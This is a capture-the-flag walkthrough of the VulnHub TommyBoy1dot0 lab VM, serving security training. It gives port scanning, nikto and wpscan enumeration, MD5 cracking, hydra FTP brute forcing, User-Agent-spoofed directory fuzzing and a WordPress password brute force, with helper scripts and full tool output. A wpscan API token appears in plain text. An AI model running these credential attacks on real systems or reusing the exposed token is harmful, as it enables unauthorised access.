
VulnHub target practice: TommyBoy1dot0

Setting up the target environment


Attacker machine

  1. Look up the attacker machine's IP address (Kali is 192.168.80.123/24 on eth0):
    root@kali:~# ip addr show
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
    valid_lft forever preferred_lft forever
    2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b5:c3:a6 brd ff:ff:ff:ff:ff:ff
    inet 192.168.80.123/24 brd 192.168.80.255 scope global eth0
    valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:feb5:c3a6/64 scope link
    valid_lft forever preferred_lft forever
  2. Use arp-scan -l to discover the target's IP on the local segment. Kali itself is not listed, so the only remaining 00:0c:29 (VMware guest) address, 192.168.80.13, is the target; the 00:50:56 entries are the host's virtual adapters and VMware's network services.
    root@kali:~# arp-scan -l
    Interface: eth0, datalink type: EN10MB (Ethernet)
    Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
    192.168.80.1 00:50:56:c0:00:08 VMware, Inc.
    192.168.80.2 00:50:56:fc:96:a7 VMware, Inc.
    192.168.80.13 00:0c:29:36:78:84 VMware, Inc.
    192.168.80.254 00:50:56:fa:63:60 VMware, Inc.

    4 packets received by filter, 0 packets dropped by kernel
    Ending arp-scan 1.9.5: 256 hosts scanned in 1.962 seconds (130.48 hosts/sec). 4 responded
  3. Use masscan to find open ports across the full TCP range. Three ports answer: 22, 80 and 8008. A rate of 10000 packets/s against a VM can drop replies, so a port that is hinted at later but missing here is worth a second, slower sweep.
    root@kali:~# masscan -p1-65535 192.168.80.13/32 --rate=10000

    Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-18 10:52:45 GMT
    -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
    Initiating SYN Stealth Scan
    Scanning 1 hosts [65535 ports/host]
    Discovered open port 22/tcp on 192.168.80.13
    Discovered open port 80/tcp on 192.168.80.13
    Discovered open port 8008/tcp on 192.168.80.13
  4. Next, run nmap against those ports. It reports port 22 as ssh and ports 80 and 8008 as http. Note that without -sV and -sC this is not a deep scan: the service names come from nmap's default port-to-name table, not from fingerprinting the banners. Adding -sV (version detection) and -sC (default scripts) is what would identify the actual web server and SSH versions.
    root@kali:~# nmap 192.168.80.13 -p22,80,8008
    Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-18 19:00 CST
    Nmap scan report for 192.168.80.13
    Host is up (0.00045s latency).

    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    8008/tcp open http
    MAC Address: 00:0C:29:36:78:84 (VMware)

    Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
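The recon steps above feed one into the next: masscan's "Discovered open port" lines become the port list for nmap. The following helper, added here as an example and not part of the original walkthrough, parses that masscan output and builds the version-detection nmap command for each host. The sample output is constructed from the lines shown above; the second host (192.168.80.14) is invented only to show per-host grouping.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Constructed sample: the masscan lines from the run above, plus an invented
# second host so the per-host grouping is visible.
SAMPLE_MASSCAN_OUTPUT = """\
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-02-18 10:52:45 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 192.168.80.13
Discovered open port 8008/tcp on 192.168.80.13
Discovered open port 80/tcp on 192.168.80.13
Discovered open port 21/tcp on 192.168.80.14
"""

# masscan prints exactly one line of this fixed form per open port.
DISCOVERED_RE = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<host>\S+)"
)


def parse_masscan(lines: Iterable[str]) -> Dict[str, List[int]]:
    """Map each host to its sorted list of open TCP ports.

    masscan randomises probe order, so ports arrive unsorted; they are sorted
    here. UDP lines are skipped because the follow-up nmap command is TCP-only.
    """
    found: Dict[str, set] = defaultdict(set)
    for line in lines:
        m = DISCOVERED_RE.match(line.strip())
        if m and m.group("proto") == "tcp":
            found[m.group("host")].add(int(m.group("port")))
    return {host: sorted(ports) for host, ports in found.items()}


def nmap_followup(host: str, ports: List[int]) -> str:
    """Build the nmap command that fingerprints the ports masscan found.

    -sV grabs and matches service banners and -sC runs the default NSE
    scripts; together they turn "8008/tcp open http" into a server name
    and version instead of a table lookup.
    """
    port_list = ",".join(str(p) for p in ports)
    return f"nmap -sV -sC -p{port_list} {host}"


if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_MASSCAN_OUTPUT.splitlines()).items():
        print(nmap_followup(host, ports))
```

Pipe a saved masscan log into `parse_masscan` (for example `parse_masscan(open("masscan.txt"))`) and run the printed commands; masscan's `-oL` list format can be parsed the same way with a different regex.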
  5. Scan for web vulnerabilities with nikto.
    What is nikto? (reference material)

    Nikto is an open-source web security scanner written in Perl. It identifies the software versions running on a site, searches for files that pose a security risk, checks for server configuration weaknesses and for issues at the web application layer. To avoid false 404 positives it judges by the content of the response body rather than the status code alone, since files with different extensions produce different 404 bodies.
  • Scanning port 80 turns up important information.

Command:
nikto -host 192.168.80.13 -port 80

+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /aspnet_client over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 498, size: 5371fb88ff1d8, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD

The actionable lines are the robots.txt entries (the ETag and internal-IP items are minor information leaks, and the Apache version check is only against nikto's own database). robots.txt lists the path /flag-numero-uno.txt, so open http://192.168.80.13/flag-numero-uno.txt in the browser to get the first flag: Flag data: B34rcl4ws
6. View the page source; the key clue is a reference to the company blog.
To find the blog you first have to watch a YouTube video: https://www.youtube.com/watch?v=VUxOd4CszJ8. The video consists of a single line, "Hey, prehistoric forest", so the blog URL is guessed as http://192.168.80.13/prehistoricforest/ (a WordPress install, as the wpscan run further down confirms).
7. In the blog, a comment on the first post contains the hint for the next flag: Flag #2: thisisthesecondflagyayyou.txt
Following the hint, open http://192.168.80.13/prehistoricforest/thisisthesecondflagyayyou.txt to get the second flag: Flag data: Z4l1nsky
8. The post titled "son of A" contains further hints.
Hint 1: the password for the password-protected post is to be found under the directory http://192.168.80.13/richard.
Download the image in that directory and read its EXIF metadata; it contains an MD5 hash: ce154b5a8e59c89732bc25d6a2e6b90b
MD5 is a one-way hash, not encryption, so the hash is not "decrypted"; an online lookup service simply compares it against a table of precomputed hashes. The lookup resolves to spanky, which is the password for the protected post. (On a real engagement, prefer cracking the hash locally rather than submitting it to a third-party site.)
Use the password to open the protected post.
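The lookup described above is a dictionary attack: hash every candidate and compare. The following script, added here as an example and not part of the original walkthrough, does the same check offline against a wordlist. The small inline wordlist is constructed for the example; a real run would stream rockyou.txt through `crack_md5_from_file` instead.

```python
import hashlib
from typing import Iterable, Optional

# Hash recovered from the EXIF metadata of the image under /richard (from the writeup).
TARGET_MD5 = "ce154b5a8e59c89732bc25d6a2e6b90b"

# Constructed stand-in for a wordlist such as rockyou.txt.
SAMPLE_WORDLIST = ["123456", "password", "callahan", "spanky", "tommyboy"]


def md5_hex(candidate: str) -> str:
    """Hex-encoded MD5 of a candidate password, the same form as the EXIF value."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


def crack_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 equals target_hex, or None.

    MD5 cannot be reversed; all an online 'decryptor' does is look the digest up
    in a table of precomputed hashes, which is what this loop does locally.
    The target is lowercased first so an uppercase hash from another tool still
    matches, and each candidate has its line ending stripped so a wordlist file
    can be passed in directly.
    """
    target = target_hex.strip().lower()
    if len(target) != 32 or any(c not in "0123456789abcdef" for c in target):
        raise ValueError("target is not a 32-character hex MD5 digest")
    for word in candidates:
        word = word.rstrip("\r\n")
        if md5_hex(word) == target:
            return word
    return None


def crack_md5_from_file(target_hex: str, path: str) -> Optional[str]:
    """Stream a wordlist from disk. rockyou.txt contains non-UTF-8 lines, hence errors='ignore'."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return crack_md5(target_hex, fh)


if __name__ == "__main__":
    print(crack_md5(TARGET_MD5, SAMPLE_WORDLIST))
```

For anything larger than a few million candidates, hashcat mode 0 (raw MD5) does the same work on the GPU; the script is for understanding what the lookup actually is.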
Brute-force the FTP account nickburns with hydra. -e nsr tries three guesses per login: an empty password (n), the login name itself (s) and the login name reversed (r). The password turns out to be nickburns. But my port scans had not shown port 65534 at all :/
It turned out the service on this port is unstable and goes up and down, so a single sweep can miss it; if a hinted service is absent, rescan later (and at a lower masscan rate).

root@kali:~# hydra -e nsr -l nickburns ftp://192.168.80.13:65534/
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-18 20:13:54
[DATA] max 3 tasks per 1 server, overall 3 tasks, 3 login tries (l:1/p:3), ~1 try per task
[DATA] attacking ftp://192.168.80.13:65534/
[65534][ftp] host: 192.168.80.13 login: nickburns password: nickburns
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-18 20:13:57

Log in to the FTP service with that username and password (the banner identifies it as ProFTPD-style "Callahan_FTP_Server 1.3.5"):

root@kali:~# ftp 192.168.80.13 65534
Connected to 192.168.80.13.
220 Callahan_FTP_Server 1.3.5
Name (192.168.80.13:root): nickburns
331 Password required for nickburns
Password:
230 User nickburns logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

List the files on the FTP server. There is a readme.txt; get it to the local machine.

ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 nickburns nickburns 977 Jul 15 2016 readme.txt
226 Transfer complete
ftp> get readme.txt
local: readme.txt remote: readme.txt
200 PORT command successful
150 Opening BINARY mode data connection for readme.txt (977 bytes)
226 Transfer complete
977 bytes received in 0.10 secs (9.7746 kB/s)
ftp> bye
221 Goodbye.

Let's see what readme.txt says. It tells us that important material lives in a subfolder called NickIzL33t "on this server", and that an encrypted zip of Big Tom's passwords, plus a hint sheet for its password, sits in the same folder. The folder is not under the FTP root; as the next step shows, it is served by the second web server on port 8008.

root@kali:~# cat readme.txt
To my replacement:

If you're reading this, you have the unfortunate job of taking over IT responsibilities
from me here at Callahan Auto. HAHAHAHAHAAH! SUCKER! This is the worst job ever! You'll be
surrounded by stupid monkeys all day who can barely hit Ctrl+P and wouldn't know a fax machine
from a flame thrower!

Anyway I'm not completely without mercy. There's a subfolder called "NickIzL33t" on this server
somewhere. I used it as my personal dropbox on the company's dime for years. Heh. LOL.
I cleaned it out (no naughty pix for you!) but if you need a place to dump stuff that you want
to look at on your phone later, consider that folder my gift to you.

Oh by the way, Big Tom's a moron and always forgets his passwords and so I made an encrypted
.zip of his passwords and put them in the "NickIzL33t" folder as well. But guess what?
He always forgets THAT password as well. Luckily I'm a nice guy and left him a hint sheet.

Good luck, schmuck!

LOL.

-Nick

So we browse to http://192.168.80.13:8008/NickIzL33t and get the following result.
When the User-Agent is switched to iOS with the User-Agent Switcher and Manager browser extension, the page changes to this:
It hints that to get the site's password we need to find an HTML file. So we brute-force the directory for the right HTML file. Because the server keys its response on the User-Agent, every tool used below has to send an iPhone User-Agent string, otherwise it only ever sees the unchanged page.
Approach 1: brute force with Burp Suite Intruder.
Payload (the §page§ marker is the Intruder insertion point; note that the Host header in this captured request reads 192.168.1.15:8008, a different lab address, and must be 192.168.80.13:8008 for this target):

GET /NickIzL33t/§page§.html HTTP/1.1
Host: 192.168.1.15:8008
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 15 Jul 2016 02:11:27 GMT
If-None-Match: "10e-537a322dc0ba6-gzip"
Cache-Control: max-age=0

The If-Modified-Since and If-None-Match headers were copied from the browser; drop them when fuzzing, otherwise a matching resource may come back as 304 Not Modified and be filtered out as uninteresting.
Approach 2: brute force with DirBuster.
DirBuster usage (set the User-Agent to the iPhone string in its options, or the request will not reach the mobile version of the page).
Approach 3: brute force with dirb (this did not succeed; -a sets the User-Agent and -X appends the extension):

dirb http://192.168.80.13:8008/NickIzL33t/ /usr/share/wordlists/rockyou.txt -a "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" -X .html

Approach 4: brute force with wfuzz.
Common wfuzz usage (-H sets the iPhone User-Agent header, --hc 404 hides 404 responses, FUZZ is replaced by each wordlist entry):

wfuzz -Z -c -v -w /usr/share/wordlists/rockyou.txt -H "User-Agent:Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16" --hc 404 http://192.168.80.13:8008/NickIzL33t/FUZZ.html

The wordlist contains entries with spaces, which made the program error out. Painful. rockyou.txt is a password list, not a path list; it needs cleaning (or a proper directory wordlist) before it is fed to a URL fuzzer.
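The wfuzz failure above comes from feeding a raw password list into a URL fuzzer. The following script, added here as an example and not part of the original walkthrough, cleans such a list for path brute-forcing: it strips line endings, drops empty lines, duplicates and entries that would change the path depth, and percent-encodes anything that is not URL-safe. The sample lines are constructed to show each case.

```python
from typing import Iterable, Iterator, List
from urllib.parse import quote

# Constructed sample lines of the kind found in rockyou.txt: CR/LF endings,
# an embedded space, an empty line, a duplicate, a slash and a non-ASCII entry.
SAMPLE_LINES = [
    "index\r\n",
    "admin\n",
    "my password\n",
    "\n",
    "admin\n",
    "a/b\n",
    "  login \n",
    "café\n",
]


def sanitize_wordlist(lines: Iterable[str], allow_spaces: bool = False) -> Iterator[str]:
    """Yield unique, URL-safe candidates for a FUZZ.html style brute force.

    Entries containing whitespace break tools that build one request per raw
    line. By default they are dropped (directory wordlists rarely contain them);
    with allow_spaces=True they are kept and percent-encoded instead. Entries
    with '/' are dropped because they would add a path component rather than
    name a file.
    """
    seen = set()
    for raw in lines:
        word = raw.strip()  # remove CR/LF and surrounding blanks
        if not word or "/" in word:
            continue
        if not allow_spaces and any(ch.isspace() for ch in word):
            continue
        # quote() percent-encodes spaces and non-ASCII; safe="" also encodes '/'.
        encoded = quote(word, safe="")
        if encoded in seen:
            continue
        seen.add(encoded)
        yield encoded


def fuzz_urls(base: str, lines: Iterable[str], ext: str = ".html") -> List[str]:
    """Expand base + candidate + ext, mirroring wfuzz's FUZZ.html placement."""
    base = base.rstrip("/") + "/"
    return [base + word + ext for word in sanitize_wordlist(lines)]


def write_clean_wordlist(src: str, dst: str) -> int:
    """Clean a wordlist file on disk and return the number of entries written.
    rockyou.txt has non-UTF-8 lines, hence errors='ignore'."""
    with open(src, encoding="utf-8", errors="ignore") as fin, open(dst, "w") as fout:
        count = 0
        for word in sanitize_wordlist(fin):
            fout.write(word + "\n")
            count += 1
    return count


if __name__ == "__main__":
    for url in fuzz_urls("http://192.168.80.13:8008/NickIzL33t/", SAMPLE_LINES):
        print(url)
```

Run `write_clean_wordlist("/usr/share/wordlists/rockyou.txt", "paths.txt")` once and point wfuzz's -w at paths.txt; the iPhone User-Agent header still has to be supplied on the wfuzz command line.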

Generate a password wordlist with crunch (the pattern presumably follows the hint sheet for Big Tom's zip password that readme.txt mentions). In a -t pattern, "," stands for one uppercase letter, "%" for one digit, "@" for one lowercase letter and "^" for one symbol; every other character is literal. So this pattern fixes the prefix bev and the suffix 1995 and varies the six characters in between, for 13 characters in total (hence the min/max length of 13 13):

crunch 13 13 -t bev,%%@@^1995 -o tommy.txt
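To see what that crunch pattern actually produces, and how big the list gets before committing to a brute force, here is a Python equivalent of the -t expansion. It is an added example, not part of the original walkthrough or of crunch; the symbol set used for "^" is an assumption made for the example (crunch's built-in default set is larger), so the count printed for "^" positions depends on it.

```python
import itertools
import string
from typing import Iterator

# crunch -t placeholder classes. SYMBOLS is an assumed set for this example;
# substitute crunch's own default (or the charset you pass it) for exact counts.
LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase
DIGITS = string.digits
SYMBOLS = "!@#$%^&*()-_+="

PLACEHOLDERS = {"@": LOWER, ",": UPPER, "%": DIGITS, "^": SYMBOLS}


def slots(pattern: str) -> list:
    """Translate a -t pattern into one candidate character set per position.

    Placeholder characters map to their class; anything else is a literal and
    contributes a one-character set.
    """
    return [PLACEHOLDERS.get(ch, ch) for ch in pattern]


def keyspace(pattern: str) -> int:
    """Number of candidates the pattern expands to (product of the slot sizes)."""
    n = 1
    for charset in slots(pattern):
        n *= len(charset)
    return n


def estimate_bytes(pattern: str) -> int:
    """Approximate size of the -o output file: each line is the pattern length plus a newline."""
    return keyspace(pattern) * (len(pattern) + 1)


def expand(pattern: str) -> Iterator[str]:
    """Yield every candidate; the rightmost placeholder varies fastest."""
    for combo in itertools.product(*slots(pattern)):
        yield "".join(combo)


def write_wordlist(pattern: str, path: str) -> int:
    """Equivalent of crunch ... -t PATTERN -o PATH; returns the number of lines written."""
    count = 0
    with open(path, "w") as fh:
        for candidate in expand(pattern):
            fh.write(candidate + "\n")
            count += 1
    return count


if __name__ == "__main__":
    pattern = "bev,%%@@^1995"
    print(f"{pattern}: {keyspace(pattern)} candidates, about {estimate_bytes(pattern) // 1_000_000} MB")
    print("first candidate:", next(expand(pattern)))
```

With the assumed 14-symbol set the pattern yields 26 x 10 x 10 x 26 x 26 x 14 candidates, about 24.6 million lines; with crunch's larger default symbol set it is proportionally more. Checking `keyspace` before generating avoids filling the disk with a list that was never going to be tried.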

Next we use wpscan --url http://192.168.80.13/prehistoricforest --enumerate u --api-token XLupJiXSlrJM4j1tUKggDoVYGzR7VqB9fsevFf9sfn0 to enumerate the site's usernames (author pages, the RSS feed and author-ID brute forcing; wp-login.php's differing error messages then confirm which names are real accounts).
Result:

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <===================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] tommy
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] richard
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Tom Jr.
| Found By: Rss Generator (Passive Detection)

[+] Big Tom
| Found By: Rss Generator (Passive Detection)

[+] michelle
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

"Tom Jr." and "Big Tom" come only from the RSS generator, i.e. they are display names; the four names confirmed by login error messages (tommy, richard, tom, michelle) are the actual login accounts worth attacking.
Decompress rockyou.txt.gz and use that wordlist for the brute force:
kali@kali:/usr/share/wordlists$ sudo gzip -d rockyou.txt.gz (sudo is needed here because the directory is owned by root).

Brute force, to be continued...

Continue with wpscan to brute-force the WordPress login password. It was not easy; it took a long time to find the usage for wpscan 3.0 and later (reference article). Brute-forcing tom's password gives tomtom1. Probably nobody else spends two days brute-forcing a password this simple.

kali@kali:~$ sudo wpscan --url http://192.168.80.13/prehistoricforest/ --usernames tom --passwords /usr/share/wordlists/rockyou.txt --api-token XLupJiXSlrJM4j1tUKggDoVYGzR7VqB9fsevFf9sfn0 --max-threads 100
_______________________________________________________________

WordPress Security Scanner by the WPScan Team
Version 3.7.6

@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://192.168.80.13/prehistoricforest/
[+] Started: Thu Feb 20 03:29:20 2020

Interesting Finding(s):

[+] http://192.168.80.13/prehistoricforest/
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.80.13/prehistoricforest/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.80.13/prehistoricforest/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] http://192.168.80.13/prehistoricforest/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.5.20 identified (Latest, released on 2019-12-12).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.80.13/prehistoricforest/index.php/feed/, <generator>https://wordpress.org/?v=4.5.20</generator>
| - http://192.168.80.13/prehistoricforest/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.5.20</generator>

[+] WordPress theme in use: twentysixteen
| Location: http://192.168.80.13/prehistoricforest/wp-content/themes/twentysixteen/
| Last Updated: 2019-05-07T00:00:00.000Z
| Readme: http://192.168.80.13/prehistoricforest/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.0
| Style URL: http://192.168.80.13/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.20
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.80.13/prehistoricforest/wp-content/themes/twentysixteen/style.css?ver=4.5.20, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:03 <=============================> (21 / 21) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[+] Performing password attack on Wp Login against 1 user/s
Error: Server error, try reducing the number of threads.
Trying tom / tomtom1 Time: 00:06:20 <=============================> (24700 / 24700) 100.00% Time: 00:06:20
[SUCCESS] - tom / tomtom1

[i] Valid Combinations Found:
| Username: tom, Password: tomtom1

[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 44

[+] Finished: Thu Feb 20 03:37:19 2020
[+] Requests Done: 24772
[+] Cached Requests: 5
[+] Data Sent: 8.24 MB
[+] Data Received: 107.827 MB
[+] Memory used: 1.162 GB
[+] Elapsed time: 00:07:59
  • wpscan parameters
    • --url: the URL of the WordPress site; wpscan locates wp-login.php under it itself.
    • --passwords: the password wordlist; here Kali's bundled rockyou.txt.
    • --usernames: a single username or a file of usernames.
    • --max-threads: maximum number of concurrent requests. The default is 5 (so small the brute force might run until the end of the world); set to 100 here. The "Error: Server error, try reducing the number of threads" line in the output is the target failing to keep up with that concurrency; wpscan retried and still finished, but on a real engagement that message is the cue to lower it.
    • --api-token: the personal API token requested from the wpscan site; the free plan allows 50 requests per day.